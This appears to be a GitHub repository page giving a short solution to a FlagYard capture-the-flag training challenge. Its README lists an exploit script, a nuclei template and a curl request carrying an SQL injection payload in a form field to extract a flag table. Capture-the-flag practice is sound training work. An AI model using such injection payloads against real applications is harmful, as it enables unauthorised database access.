Skip to content

Flagyard is an online platform that offers hands-on cybersecurity training, including various types of capture-the-flag

Notifications You must be signed in to change notification settings

vinay7751/FlagYard

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
 
 
 
 
 
 

Repository files navigation

FlagYard

Flagyard is an online platform that offers hands-on cybersecurity training, including various types of capture-the-flag

#nooter https://flagyard.com/labs/training-labs/2/challenges/00c862b7-13cb-4142-8116-3dde550f4daa

Method 1:

Step 1: Run python exploit.py

Step 2: Enter URL and Your session cookie 2

Method 2:

#curl -X POST http://example.com -H "Content-Type: application/x-www-form-urlencoded" -H "Cookie: session=YOUR_SESSION_COOKIE" --data "note=AppSec' || (select * from flag)) --"

Method 3:

#nuclei -t flag-extraction.yaml -u http://example.com -var cookie="YOUR_SESSION_COOKIE"

About

Flagyard is an online platform that offers hands-on cybersecurity training, including various types of capture-the-flag

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages